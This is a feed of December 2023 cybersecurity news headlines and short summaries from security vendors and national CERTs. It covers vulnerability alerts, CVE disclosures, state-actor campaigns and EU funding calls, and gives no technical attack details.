AI is becoming ubiquitous, as developers of widely used tools like GitHub and Photoshop are quickly implementing and iterating on AI-enabled features. With Microsoft’s recent integration of Copilot into Windows, AI is even on the old stalwart of computing—the desktop. The integration of an AI assistant into an entire operating system is […]

https://blog.trailofbits.com/2023/12/27/ai-in-windows-investigating-windows-copilot/
The National Cyber Security Centre Finland’s weekly review – 51/2023
2023-12-27T13:39:09Z | 1703684349

This week we report, among other things, about various frauds and the possibilities offered by electronic tools, the Digital Europe Programme and phishing of private e-mail accounts.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-512023
The National Cyber Security Centre Finland’s weekly review – 51/2023
2023-12-27T13:39:09Z | 1703684349

This week we report, among other things, about various frauds and the possibilities offered by electronic tools, the Digital Europe Programme and phishing of private e-mail accounts.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-512023
We’ve added more content to ZKDocs
2023-12-26T14:00:59Z | 1703599259

We’ve updated ZKDocs with four new sections and additions to existing content. ZKDocs provides explanations, guidance, and documentation for cryptographic protocols that are otherwise sparingly discussed but are used in practice. As such, we’ve added four new sections detailing common protocols that previously lacked implementation guidance: The Inner Product Argument (IPA), which […]

https://blog.trailofbits.com/2023/12/26/weve-added-more-content-to-zkdocs/
Publicado Boletim n.º 5/2023 do Observatório de Cibersegurança
2023-12-26T00:00:00Z | 1703548800

Foi publicado o último Boletim de 2023 do Observatório de Cibersegurança. Esta edição tem como tema a nova Diretiva (UE) 2022/2555, mais conhecida por SRI 2. Esta Diretiva é relativa a medidas destinadas a garantir um elevado nível comum de cibersegurança na União e vem atualizar e melhorar a Diretiva SRI 1, a qual resultou, em Portugal, no Regime Jurídico de Segurança do Ciberespaço. Neste Boletim é possível conhecer um pouco melhor o processo que conduziu a esta nova Diretiva e aquilo que ela traz de novo. Como sempre, o Boletim também partilha notícias e documentos considerados de interesse. Consulte o documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135818/publicado-boletim-n-52023-do-observatorio-de-ciberseguranca
instipod DuoUniversalKeycloakAuthenticator challenge information disclosure vulnerability
2023-12-23T00:00:00Z | 1703289600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1907
Catching OpenSSL misuse using CodeQL
2023-12-22T14:00:35Z | 1703253635

I’ve created five CodeQL queries that catch potentially potent bugs in the OpenSSL libcrypto API, a widely adopted but often unforgiving API that can be misused to cause memory leaks, authentication bypasses, and other subtle cryptographic issues in implementations. These queries—which I developed during my internship with my mentors, Fredrik Dahlgren and […]

https://blog.trailofbits.com/2023/12/22/catching-openssl-misuse-using-codeql/
Is the LoA DoA for Routing
2023-12-22T10:30:00Z | 1703241000

Back in the early days of the Internet, when everybody knew everybody, the way that you validated yourself to a Certificate Authority (CA) for an X509 certificate for Secure Sockets Layer (SSL) was to send a fax on company letterhead.

https://www.first.org/blog/20231222-Is-the-LoA-DoA-for-Routing
Is the LoA DoA for Routing
2023-12-22T10:30:00Z | 1703241000

Back in the early days of the Internet, when everybody knew everybody, the way that you validated yourself to a Certificate Authority (CA) for an X509 certificate for Secure Sockets Layer (SSL) was to send a fax on company letterhead.

https://www.first.org/blog/20231222-Is-the-LoA-DoA-for-Routing
High Threat Security Alert (A23-12-17): Vulnerability in Microsoft Edge
2023-12-22T04:00:00Z | 1703217600

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Weaponizing DHCP DNS Spoofing ? A Hands-On Guide
2023-12-21T15:00:00Z | 1703170800

https://www.akamai.com/blog/security-research/2023/dec/weaponizing-dhcp-dns-spoofing-hands-on-guide
Akamai?s Responsibility to Our Enterprise Customers
2023-12-21T14:00:00Z | 1703167200

https://www.akamai.com/blog/news/2023/dec/akamai-responsibility-to-our-enterprise-customers
High Threat Security Alert (A23-12-16): Vulnerability in Google Chrome
2023-12-21T04:00:00Z | 1703131200

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Noname Security Platform Updates: 3.24 Release
2023-12-21T02:40:00Z | 1703126400

https://www.akamai.com/blog/security/2024/sep/noname-security-platform-updates-324-release
Vulnerability in MegaBIP and SmodBIP software
2023-12-20T19:00:00Z | 1703098800

Stored XSS vulnerability has been found in SmodBIP and MegaBIP software (CVE-2023-5378).

https://cert.pl/en/posts/2023/12/CVE-2023-5378/
Summer interns 2023 recap
2023-12-20T14:00:13Z | 1703080813

This past summer at Trail of Bits was a season of inspiration, innovation, and growth thanks to the incredible contributions of our talented interns, who took on a diverse range of technical projects under the mentorship of Trail of Bits engineers. We’d like to delve into their accomplishments, from enhancing the efficiency of fuzzing tools […]

https://blog.trailofbits.com/2023/12/20/summer-associates-2023-recap/
The Do?s and Don?ts of Modern API Security
2023-12-20T14:00:00Z | 1703080800

https://www.akamai.com/blog/security/2023/dec/the-dos-and-donts-of-api-security
Women Can Make a Difference in the Field of Data Science
2023-12-20T14:00:00Z | 1703080800

https://www.akamai.com/blog/culture/2023/dec/women-can-make-a-difference-in-data-science
Security Alert (A23-12-14): Multiple Vulnerabilities in Firefox
2023-12-20T04:00:00Z | 1703044800

Mozilla has published the advisories (MFSA2023-54 and MFSA2023-56) to address multiple vulnerabilities in various versions of Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-12-15): Vulnerability in OpenSSH
2023-12-20T04:00:00Z | 1703044800

OpenSSH has released a new version to address a vulnerability in various versions of OpenSSH.

https://www.govcert.gov.hk/en/alerts_detail.php
Spike in Atlassian Exploitation Attempts: Patching is Crucial
2023-12-20T00:00:00Z | 1703030400

In the blog we discuss the importance of securing your Atlassian products, provide valuable insights on various IP activities, and offer friendly advice on proactive measures to protect your organization.

https://www.greynoise.io/blog/spike-in-atlassian-exploitation-attempts-patching-is-crucial
Analysis of Rhadamanthys Malware
2023-12-19T16:17:02Z | 1703002622

In the final quarter of 2022, the infostealer malware, Rhadamanthys, was found. Given that it

https://virtualattacks.com/analysis-of-rhadamanthys-malware/
Novel Detection of Process Injection Using Network Anomalies
2023-12-19T15:00:00Z | 1702998000

https://www.akamai.com/blog/security-research/2023/dec/novel-detection-methodology-process-injection-using-network-anomalies
Insights from Survey of Financial Services Cyber Leaders in Asia-Pacific
2023-12-19T14:00:00Z | 1702994400

https://www.akamai.com/blog/security/2023/dec/insights-from-survey-financial-services-cyber-leaders-asia-pacific
The National Cyber Security Centre Finland’s weekly review – 50/2023
2023-12-19T08:23:37Z | 1702974217

This week, we provide information about WhatsApp recruitment scams, among other topics. We also remind our readers what they should take into account when purchasing and setting up smart devices.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-502023
The National Cyber Security Centre Finland’s weekly review – 50/2023
2023-12-19T08:23:37Z | 1702974217

This week, we provide information about WhatsApp recruitment scams, among other topics. We also remind our readers what they should take into account when purchasing and setting up smart devices.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-502023
Mute the Sound: Chaining Vulnerabilities to Achieve RCE on Outlook: Pt 2
2023-12-18T15:00:00Z | 1702911600

https://www.akamai.com/blog/security-research/2023/dec/chaining-vulnerabilities-to-achieve-rce-part-two
Mute the Sound: Chaining Vulnerabilities to Achieve RCE on Outlook: Pt 1
2023-12-18T15:00:00Z | 1702911600

https://www.akamai.com/blog/security-research/2023/dec/chaining-vulnerabilities-to-achieve-rce-part-one
CVE-2022-46141
2023-12-18T14:22:00Z | 1702909320

Siemens has released a new version of STEP 7 (TIA Portal) that fixes an information disclosure vulnerability. A local attacker could gain access to the access level password of the SIMATIC S7-1200 and S7-1500 CPUs, when entered by a legitimate user in the hardware configuration of the affected application.

https://claroty.com/team82/disclosure-dashboard/cve-2022-46141
The Shift to Distributed Cloud: The Next Era of Cloud Infrastructure
2023-12-18T14:00:00Z | 1702908000

https://www.akamai.com/blog/cloud/2023/dec/the-next-era-of-cloud-infrastructure
EU funding available for different sub-areas in the cybersecurity sector under Digital Europe programme
2023-12-18T13:38:56Z | 1702906736

The European Commission's Digital Europe funding programme has announced new funding calls in the cybersecurity sector. The themes of the calls include for example the development of skills and the promotion of artificial intelligence, quantum cryptography and cyber resilience regulation.

https://www.kyberturvallisuuskeskus.fi/en/news/eu-funding-available-different-sub-areas-cybersecurity-sector-under-digital-europe-programme
EU funding available for different sub-areas in the cybersecurity sector under Digital Europe programme
2023-12-18T13:38:56Z | 1702906736

The European Commission's Digital Europe funding programme has announced new funding calls in the cybersecurity sector. The themes of the calls include for example the development of skills and the promotion of artificial intelligence, quantum cryptography and cyber resilience regulation.

https://www.kyberturvallisuuskeskus.fi/en/news/eu-funding-available-different-sub-areas-cybersecurity-sector-under-digital-europe-programme
A trail of flipping bits
2023-12-18T13:30:16Z | 1702906216

Trusted execution environments (TEE) such as secure enclaves are becoming more popular to secure assets in the cloud. Their promise is enticing because when enclaves are properly used, even the operator of the enclave or the cloud service should not be able to access those assets. However, this leads to […]

https://blog.trailofbits.com/2023/12/18/a-trail-of-flipping-bits/
How to Build the Perfect Network Without SLAs
2023-12-18T11:47:55Z | 1702900075

If you are used to managed MPLS services, transitioning to Internet last-mile access as part of SD-WAN or SASE might cause some concern. How can enterprises ensure they are getting a reliable network if they are not promised end-to-end SLAs? The answer: by dividing the enterprise backbone into the two last miles connected by a... The post How to Build the Perfect Network Without SLAs appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-build-the-perfect-network-without-slas/
Security Alert (A23-12-12): Multiple Vulnerabilities in Microsoft Edge
2023-12-18T04:00:00Z | 1702872000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-12-13): Multiple Vulnerabilities in Fortinet Products
2023-12-18T04:00:00Z | 1702872000

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
Open Calls: Oportunidades de financiamento no âmbito do Programa Europa Digital
2023-12-18T00:00:00Z | 1702857600

Irá decorrer entre 16 de janeiro e 26 de março de 2024 o período de submissão de propostas no âmbito da “Call Deployment Actions in the area of Cybersecurity (DIGITAL-ECCC-2024-DEPLOY-CYBER-06)”, ao abrigo do Programa Europa Digital. A call prevê seis tópicos que vão desde a introdução de Inteligência Artificial e outras tecnologias inovadoras em SOCs, no apoio às PME, Indústria e Administração Pública, em linha com o cumprimento do Cyber Resilience Act e a utilização de criptografia pós-quântica. Esta call estima apoiar em cerca de 84M€ os vários projetos que podem vir a ser enquadrados num dos seguintes tópicos: DIGITAL-ECCC-2024-DEPLOY-CYBER-06- ENABLINGTECH - Novel applications of AI and Other Enabling Technologies for Security Operation Centres; DIGITAL-ECCC-2024-DEPLOY-CYBER-06-STRENGTHENCRA - Strengthening cybersecurity capacities of European SMEs in line with CRA requirements and obligations; DIGITAL-ECCC-2024-DEPLOY-CYBER-06-CRATOOLS - Tools for compliance with CRA requirements and obligations; DIGITAL-ECCC-2024-DEPLOY-CYBER-06-PQCINDUSTRY- Deployment of Post Quantum Cryptography in systems in industrial sectors; DIGITAL-ECCC-2024-DEPLOY-CYBER-06-PQCSTANDARD - Standardisation and awareness of the European transition to post-quantum cryptography; DIGITAL-ECCC-2024-DEPLOY-CYBER-06-PQCTRANS - Roadmap for the transition of European public administrations to a post-quantum cryptography era. Os projetos financiados são geridos pelo Centro Europeu de Competências em Cibersegurança (ECCC).  Candidate-se aqui, para esclarecimentos adicionais contacte-nos através do email: ncc@cncs.gov.pt  

https://dyn.cncs.gov.pt/pt/detalhe/art/135815/open-calls-oportunidades-de-financiamento-no-ambito-do-programa-europa-digital
Weathering 2024: Storm Watch Predictions for the Year Ahead
2023-12-18T00:00:00Z | 1702857600

See what predictions and hot takes our Storm Watch hosts have for 2024.

https://www.greynoise.io/blog/weathering-2024-storm-watch-predictions-for-the-year-ahead
Apache Struts 2 Remote Code Execution (CVE-2023-50164) – Cato’s Analysis and Mitigation
2023-12-17T10:59:37Z | 1702810777

By Vadim Freger, Dolev Moshe Attiya On December 7th, 2023, the Apache Struts project disclosed a critical vulnerability (CVSS score 9.8) in its Struts 2 open-source web framework. The vulnerability resides in the flawed file upload logic and allows attackers to manipulate upload parameters, resulting in arbitrary file upload and code execution under certain conditions.... The post Apache Struts 2 Remote Code Execution (CVE-2023-50164) – Cato’s Analysis and Mitigation appeared first on Cato Networks.

https://www.catonetworks.com/blog/apache-struts-2-remote-code-execution-cve-2023-50164-catos-analysis-and-mitigation/
Making Sure SASE Projects Are a Success
2023-12-17T08:48:39Z | 1702802919

The post Making Sure SASE Projects Are a Success appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-making-sure-sase-projects-are-a-success
Akamai?s Perspective on December?s Patch Tuesday 2023
2023-12-15T18:00:00Z | 1702663200

https://www.akamai.com/blog/security-research/2023/dec/akamai-perspective-patch-tuesday-december-2023
How to Defend Against Digital Cyberthreats This Holiday Season
2023-12-15T14:00:00Z | 1702648800

https://www.akamai.com/blog/security/2023/dec/defend-against-digital-cyberthreats-this-holiday-season
Russian FSB cyber actor Star Blizzard continues worldwide spear-phishing campaigns
2023-12-15T10:21:11Z | 1702635671

The Russia-based actor is targeting organisations and individuals in the UK and other geographical areas of interest.

https://www.ncsc.gov.uk/news/star-blizzard-continues-spear-phishing-campaigns
CNCS na conferência Cibersegurança: impactos da Diretiva NIS2 para empresas e setor público
2023-12-15T00:00:00Z | 1702598400

O coordenador do Centro Nacional de Cibersegurança, Lino Santos, foi um dos cinco convidados da conferência promovida pela TSF/DN, que decorreu a 14 de dezembro na Faculdade de Direito da Universidade de Lisboa. Fazer o ponto de situação da transposição da Nova Diretiva da União Europeia para a Cibersegurança – a NIS 2, publicada a 14 de dezembro de 2022 e avaliar o seu impacto foi o foco da conferência. Lino Santos referiu que o CNCS tem trabalhado na NIS2 desde a sua publicação. “Tem sido feito um trabalho consistente e dentro dos prazos”, referiu o coordenador do CNCS, que considera estarmos no fim de um ciclo que termina com a segunda Estratégia Nacional de Segurança do Ciberespaço e a iniciar a terceira. Explicou que uma das grandes preocupações da nova diretiva é a harmonização de novos critérios, nomeadamente quanto à definição do que é um operador de serviços essenciais, corrigindo a atual assimetria dentro da União Europeia. A NIS 2 também introduz o conceito de responsabilidade criminal, resultado de uma aprendizagem relativamente à NIS 1, cujo foco foi a gestão da segurança de informação baseada no risco. Já a NIS 2 aposta na gestão de vulnerabilidades - na prevenção, referiu Lino Santos. No campo da capacitação das organizações e dos seus recursos humanos, o coordenador destacou os vários instrumentos do CNCS para fazer face aos novos desafios do digital, nomeadamente a Academia de Cibersegurança - C-Academy, os Centros de Competências em Cibersegurança, que visam ser “um braço armado do CNCS” para cada uma das regiões do país, que vão ajudar as organizações na implementação da NIS2, estando mais próximos do tecido local e das empresas. Durante a conferência destacou-se, ainda, o papel do CNCS e da sua oferta de cursos e-learning gratuitos, que permite aumentar a capacidade de resposta e formar colaboradores, com o objetivo de prevenir de forma precoce incidentes cibernéticos. Durante duas horas Lino Santos, coordenador do CNCS, Hugo Costeira, do Observatório de Segurança Interna, Joana Mota Agostinho, da Cuatrecasas, Miguel Prata Roque, da Faculdade de Direito da Universidade de Lisboa e Ricardo Costa, da Associação Empresarial do Minho, responderam às questões colocadas pela jornalista Ana Maria Ramos e debateram o impacto da direta NIS2 para as empresas e setor público.

https://dyn.cncs.gov.pt/pt/detalhe/art/135814/cncs-na-conferencia-ciberseguranca-impactos-da-diretiva-nis2-para-empresas-e-setor-publico
DARPA’s AI Cyber Challenge: We’re In!
2023-12-14T14:00:45Z | 1702562445

We’re thrilled to announce that Trail of Bits will be competing in DARPA’s upcoming AI Cyber Challenge (AIxCC)! DARPA is challenging competitors to develop novel, fully automated AI-driven systems capable of securing the critical software that underpins the modern world. We’ve formed a team of world class software security and AI/ML experts, bringing together researchers, […]

https://blog.trailofbits.com/2023/12/14/darpas-ai-cyber-challenge-were-in/
What We've Learned from Media Cloud Adoption Trends
2023-12-14T14:00:00Z | 1702562400

Read the top takeaways from a global survey of leaders in the media and entertainment industry about their cloud adoption experiences and challenges.

https://www.akamai.com/blog/cloud/2023/dec/learned-media-cloud-adoption-trends
The National Cyber Security Centre Finland’s weekly review – 49/2023
2023-12-14T13:24:59Z | 1702560299

This week, we take a look at scam messages that attempt to scare recipients with the cancellation of their tax returns. Our other topics include the Akira ransomware in Finland and the importance of substitute arrangements during the Christmas holiday period.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-492023
The National Cyber Security Centre Finland’s weekly review – 49/2023
2023-12-14T13:24:59Z | 1702560299

This week, we take a look at scam messages that attempt to scare recipients with the cancellation of their tax returns. Our other topics include the Akira ransomware in Finland and the importance of substitute arrangements during the Christmas holiday period.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-492023
Observed Exploitation Attempts of Struts 2 S2-066 Vulnerability (CVE-2023-50164)
2023-12-14T10:00:40Z | 1702548040

The Akamai Security Intelligence Group has seen numerous exploitation attempts on Apache Struts 2 since December 7, 2023, when a critical CVE was released.

https://www.akamai.com/blog/security-research/2023/dec/apache-struts-cve-exploitation-attempts
Actively Exploited Vulnerability in QNAP VioStor NVR: Fixed, Patches Available
2023-12-14T08:00:00Z | 1702540800

https://www.akamai.com/blog/security-research/2023/dec/qnap-viostor-zero-day-vulnerability-spreading-mirai-patched
Segunda edição da C-Days Açores 2023 teve como mote Mais Confiança
2023-12-14T00:00:00Z | 1702512000

A 2.ª edição da Conferência C-Days Açores, promovida pelo Centro Nacional de Cibesergurança (CNCS) juntamente com o Governo Regional dos Açores, através da Direção Regional das Comunicações e Transição Digital (DRCTD), decorreu a 29 de novembro, na Ilha Terceira, Praia da Vitória, sob o tema “Mais Confiança”. Para o coordenador do CNCS, Lino Santos, a C-Days Açores destaca-se pela lógica de descentralização e pelo facto de ir ao encontro da população, “sempre com uma marca de profunda qualidade”, na sua perspetiva, demonstrada pela variedade dos temas apresentados. A iniciativa reuniu convidados de várias áreas com o objetivo de discutir e promover a reflexão nos domínios da sociedade, economia, políticas públicas, ética e direito, riscos e conflitos, bem como inovação e tecnologias futuras, aplicados ao ciberespaço, com vista ao incremento do nível de maturidade de cibersegurança de indivíduos e organizações. Mais confiança, trabalho em rede e cooperação, para tornar Portugal mais seguro e mais digital, foi a mensagem em vídeo, do Secretário de Estado da Digitalização e Modernização Administrativa, Mário Campolargo, na abertura da segunda edição da C-Days Açores.  Mais confiança foi também o foco da intervenção do Diretor Regional das Comunicações e da Transição Digital, Pedro Batista, que em representação do Governo dos Açores , falou do investimento feito na cibersegurança de uma forma transversal e de um trabalho contínuo nesta área.  Durante a manhã falou-se de Threat Update e Gestão de Vulnerabilidades partilhando várias perspetivas, dos Centros de Análise e Partilha de Informação, do Programa Formação Avançada em cibersegurança - C-Academy e da Rede de Centros de Competências em Cibersegurança - C-Network.  A tarde foi dedicada à transição digital e à comunicação de risco e crise em cibersegurança, tendo sido apresentado o Guia de referencial do Centro Nacional de Cibersegurança.  No final da conferência foi dado destaque à campanha pedagógica e multiplataforma #LerAntesClicarDepois e exibido um dos vídeos incluídos no kit de divulgação, dedicado às boas práticas de cibersegurança para empresas.

https://dyn.cncs.gov.pt/pt/detalhe/art/135813/segunda-edicao-da-c-days-acores-2023-teve-como-mote-mais-confianca
What is a Hybrid Attack? Today’s Biggest Cyber Threat by Mark Wojtasiak
2023-12-14T00:00:00Z | 1702512000

Demystifying hybrid attacks begins with seeing that all attack vectors comprise a single, hybrid attack surface, all attacks are hybrid attacks and end with signal clarity.

https://www.vectra.ai/blog/what-is-a-hybrid-attack-todays-biggest-cyber-threat
Mining The Undiscovered Country With GreyNoise EAP Sensors: F5 BIG-IP Edition
2023-12-14T00:00:00Z | 1702512000

Discover the fascinating story of a GreyNoise researcher who found that attackers were using his demonstration code for a vulnerability instead of the real exploit. Explore the implications of this situation and learn about the importance of using accurate and up-to-date exploits in the cybersecurity community.

https://www.greynoise.io/blog/mining-the-undiscovered-country-with-greynoise-eap-sensors-f5-big-ip-edition
CVE-2023-42494
2023-12-13T16:55:00Z | 1702486500

CWE-749: Exposed Dangerous Method or Function

https://claroty.com/team82/disclosure-dashboard/cve-2023-42494
CVE-2023-42493
2023-12-13T16:55:00Z | 1702486500

CWE-256: Plaintext Storage of a Password

https://claroty.com/team82/disclosure-dashboard/cve-2023-42493
CVE-2023-42492
2023-12-13T16:54:00Z | 1702486440

CWE-321: Use of Hard-coded Cryptographic Key

https://claroty.com/team82/disclosure-dashboard/cve-2023-42492
CVE-2023-42491
2023-12-13T16:53:00Z | 1702486380

CWE-285: Improper Authorization

https://claroty.com/team82/disclosure-dashboard/cve-2023-42491
CVE-2023-42490
2023-12-13T16:52:00Z | 1702486320

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

https://claroty.com/team82/disclosure-dashboard/cve-2023-42490
CVE-2023-42489
2023-12-13T16:51:00Z | 1702486260

CWE-732: Incorrect Permission Assignment for Critical Resource

https://claroty.com/team82/disclosure-dashboard/cve-2023-42489
CVE-2023-42488
2023-12-13T16:50:00Z | 1702486200

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

https://claroty.com/team82/disclosure-dashboard/cve-2023-42488
Russian Foreign Intelligence Service (SVR) Cyber Actors Use JetBrains TeamCity CVE in Global Targeting
2023-12-13T16:00:00Z | 1702483200

CERT Polska, Polish Military Counterintelligence Service (SKW), and external partners assess Russian Foreign Intelligence Service (SVR) cyber actors, also known as APT 29, the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard, are exploiting CVE-2023-42793 at a large scale.

https://cert.pl/en/posts/2023/12/apt29-teamcity/
Our Top Takeaways from 2023 Gartner� Market Guide for Microsegmentation
2023-12-13T14:00:00Z | 1702476000

https://www.akamai.com/blog/security/2023/dec/top-takeaways-2023-gartner-market-guide-microsegmentation
Report: Risk to the Nth Party Degree
2023-12-13T14:00:00Z | 1702476000

In this extensive research endeavor, we embark on an exploration to unravel the intricacies of interconnectedness within your supply chain. Our analysis goes beyond the conventional third-party examination, diving into the unseen layers where the true essence of your supply chain resides.

https://blog.riskrecon.com/resources/reports-and-whitepapers/report-risk-to-the-nth-party-degree
EU's Horizon Europe funding calls announced for cybersecurity sector
2023-12-13T08:52:35Z | 1702457555

The European Commission's Horizon Europe funding programme has launched new calls for research, development and innovation in the cybersecurity sector.

https://www.kyberturvallisuuskeskus.fi/en/news/eus-horizon-europe-funding-calls-announced-cybersecurity-sector
EU's Horizon Europe funding calls announced for cybersecurity sector
2023-12-13T08:52:35Z | 1702457555

The European Commission's Horizon Europe funding programme has launched new calls for research, development and innovation in the cybersecurity sector.

https://www.kyberturvallisuuskeskus.fi/en/news/eus-horizon-europe-funding-calls-announced-cybersecurity-sector
High Threat Security Alert (A23-12-10): Multiple Vulnerabilities in Microsoft Products (December 2023)
2023-12-13T04:00:00Z | 1702440000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-12-11): Multiple Vulnerabilities in Google Chrome
2023-12-13T04:00:00Z | 1702440000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
A Day In The Life Of A GreyNoise Researcher: The Path To Understanding The Remote Code Execution Vulnerability Apache (CVE-2023-50164) in Apache Struts2
2023-12-13T00:00:00Z | 1702425600

Discover what our amazing researcher Matthew Remacle uncovers as he investigates a new vulnerability in Apache Struts! This weakness enables attackers to remotely drop and call a web shell through a public interface.

https://www.greynoise.io/blog/a-day-in-the-life-of-a-greynoise-researcher-the-path-to-understanding-the-remote-code-execution-vulnerability-apache-cve-2023-50164-in-apache-struts2
Finding that one weird endpoint, with Bambdas
2023-12-12T14:11:17Z | 1702390277

Security research involves a lot of failure. It's a perpetual balancing act between taking small steps with a predictable but boring outcome, and trying out wild concepts that are so crazy they might

https://portswigger.net/research/finding-that-one-weird-endpoint-with-bambdas
RIA kuuülevaade: mitut Eesti katlamaja ja pumbajaama tabasid küberrünnakud
2023-12-12T09:10:49Z | 1702372249

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub, et novembris olid Tervisekassa teenused tehnilistel põhjustel korduvalt häiritud ning kaugkütte- ja vee-ettevõtet tabasid küberrünnakud.

https://ria.ee/uudised/ria-kuuulevaade-mitut-eesti-katlamaja-ja-pumbajaama-tabasid-kuberrunnakud
Vulnerability in SAS 9.4 software
2023-12-12T09:00:00Z | 1702371600

Reflected XSS vulnerability (CVE-2023-4932) has been found in SAS 9.4 software.

https://cert.pl/en/posts/2023/12/CVE-2023-4932/
With New Third-Party Integrations, Cato Improves Reach and Helps Customers Cuts Costs
2023-12-12T08:17:48Z | 1702369068

Consider this: By the end of 2024, Gartner has projected that over 40% of enterprises will have explicit strategies in place for SASE adoption compared to just 1% in 2018. As the “poster child” of SASE (Forrester Research’s words not mine), Cato has seen first-hand SASE’s incredible growth not just in adoption by organizations of... The post With New Third-Party Integrations, Cato Improves Reach and Helps Customers Cuts Costs appeared first on Cato Networks.

https://www.catonetworks.com/blog/with-new-third-party-integrations-cato-improves-reach-and-helps-customers-cuts-costs/
Improve Performance with HTTP/2 Stream Prioritization
2023-12-12T06:00:00Z | 1702360800

https://www.akamai.com/blog/performance/2023/dec/improve-performance-with-http2-stream-prioritization
High Threat Security Alert (A23-12-08): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-12-12T04:00:00Z | 1702353600

Apple has released iOS 16.7.3, iOS 17.2, iPadOS 16.7.3 and iPadOS 17.2 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-12-09): Vulnerability in Bluetooth devices
2023-12-12T04:00:00Z | 1702353600

A vulnerability has been identified in various devices running different operating systems, including Android, Linux, iOS and macOS, while the Bluetooth functionality is enabled.

https://www.govcert.gov.hk/en/alerts_detail.php
CSV Injection in Azure Logs by Dmitriy Beryoza
2023-12-12T00:00:00Z | 1702339200

With the global migration to the cloud, enterprises had to rethink how they track malicious activity in their environments.

https://www.vectra.ai/blog/csv-injection-in-azure-logs
Akamai EdgeWorkers for SaaS: Balancing Customization and Security
2023-12-11T14:00:00Z | 1702303200

https://www.akamai.com/blog/edge/2023/dec/akamai-edgeworkers-for-saas-balancing-customization-and-security
Say hello to the next chapter of the Testing Handbook!
2023-12-11T13:30:16Z | 1702301416

Today we are announcing the latest addition to the Trail of Bits Testing Handbook: a brand new chapter on CodeQL! CodeQL is a powerful and versatile static analysis tool, and at Trail of Bits, we regularly use CodeQL on client engagements to find common vulnerabilities and to perform variant analysis for already […]

https://blog.trailofbits.com/2023/12/11/say-hello-to-the-next-chapter-of-the-testing-handbook/
Security Alert (A23-12-07): Multiple Vulnerabilities in QNAP Products
2023-12-11T04:00:00Z | 1702267200

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Going Cloud Native, and What ?Portability? Really Means
2023-12-08T14:00:00Z | 1702044000

https://www.akamai.com/blog/cloud/2023/dec/going-cloud-native-what-portability-really-means
At Cisco Live Melbourne, an ‘incredible journey’ to innovation
2023-12-08T13:00:00Z | 1702040400

Cisco’s AI-powered, platform-based solutions support security, sustainability, and simplicity.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m12/at-cisco-live-melbourne-an-incredible-journey-to-innovation.html
What is the Dark web?
2023-12-08T10:18:30Z | 1702030710

A portion of the internet known as the “dark web” cannot be found by search

https://virtualattacks.com/what-is-the-dark-web/
Security Alert (A23-12-06): Multiple Vulnerabilities in Microsoft Edge
2023-12-08T04:00:00Z | 1702008000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Spoofing DNS Records by Abusing DHCP DNS Dynamic Updates
2023-12-07T15:00:00Z | 1701961200

https://www.akamai.com/blog/security-research/2023/dec/spoofing-dns-by-abusing-dhcp
November?s Shopping Holidays: Online Shopping, Sales, and Magecart Attacks
2023-12-07T14:00:00Z | 1701957600

https://www.akamai.com/blog/security-research/2023/dec/online-shopping-sales-and-magecart-attacks
UK and allies expose Russian intelligence services for cyber campaign of attempted political interference
2023-12-07T11:40:11Z | 1701949211

The UK and allies call out the Russian Intelligence Services for a campaign of malicious cyber activity attempting to interfere in UK politics and democratic processes

https://www.ncsc.gov.uk/news/uk-and-allies-expose-cyber-campaign-attempted-political-interference
RIA hoiatab: Eesti.ee portaali nimel tehakse petukõnesid
2023-12-07T11:26:26Z | 1701948386

Viimastel päevadel on Riigi Infosüsteemi Ameti (RIA) poole pöördunud mitu inimest, kes on saanud kahtlaseid telefonikõnesid riigiportaali eesti.ee töötajatena esinenud inimestelt.

https://ria.ee/uudised/ria-hoiatab-eestiee-portaali-nimel-tehakse-petukonesid
How Long Before Governments Ban Use of Security Appliances?
2023-12-07T08:40:27Z | 1701938427

Enterprises in the private sector look to the US federal government for cybersecurity best practices. The US CISA (Cybersecurity & Infrastructure Security Agency) issues orders and directives to patch existing products or avoid use of others. The US NIST (National Institute of Standards and Technology) publishes important documents providing detailed guidance on various security topics... The post How Long Before Governments Ban Use of Security Appliances? appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-long-before-governments-ban-use-of-security-appliances/
High Threat Security Alert (A23-12-05): Vulnerability in Apache Struts
2023-12-07T04:00:00Z | 1701921600

The Apache Software Foundation has released the security bulletins to address the vulnerability in Apache Struts.

https://www.govcert.gov.hk/en/alerts_detail.php
Vectra AI Platform Syslog Connector: Attack Signal Intelligence for your SIEM by Fabien Guillot
